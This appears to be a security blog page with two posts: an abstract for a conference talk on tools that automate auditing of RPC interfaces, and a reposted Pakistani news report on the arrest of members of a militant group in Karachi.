"RPC interfaces have historically been the source of many high profile vulnerabilities. While the protocol itself is well understood, its specifications make manual auditing tedious and difficult. The strict on-the-wire checks make communicating with an RPC server an aggravating process. Padding issues, complex embedded structures, lack of documentation, alignment, context handles, and debugging issues make crafting large requests near impossible. Our presentation will address all of these issues and we will release tools to automate the RPC auditing process. Our framework will automate the discovery of RPC servers, locating modules that define the interfaces, parsing of IDL files, and generation of client code to speak with the servers."

Video -

Slides -

Much respect to my friends at Tipping Point...

Tehreek Islami Lashkar-e-Mohammadi Gang Arrested in Pakistan

Via Daily Times (Pakistan) -

KARACHI: Ten members of the newly formed Tehreek Islami Lashkar-e-Mohammadi were arrested Friday with weapons, explosives, chemicals and poison, Jihadi literature, and hit lists of high-profile people, politicians, international and national NGOs and police officials. The organization is anti-Semitic.

The police held a press conference with IG Azhar Ali Farooqui, DIG South Javaid Ali Shah Bukhari, DIG CID Saud Ahmed Mirza, SSP Raja Umer Khattab and SP Lyari Town Fayyaz Khan to disclose the findings.

The IGP said that the alleged militants had passed a message to the government, political parties, intelligence agencies, the police, NGOs, welfare associations, judges, lawyers, international financers and businessmen, clerics and scholars of religious parties: “We announce the promulgation of the Islamic Shariah Emirate Islamia Pakistan on behalf of Lashkar-e-Mohammadi. Following the promulgation, any act contrary to the provisions of the Shariah will not be tolerated anywhere in Pakistan.” They did not contact the media and the IG said he could not say why.

The men were arrested in coordination with the district Crime Investigation Department (CID) police after a spy informed them that a newly formed terrorist organization was engaged in planning for Election Day and the days after.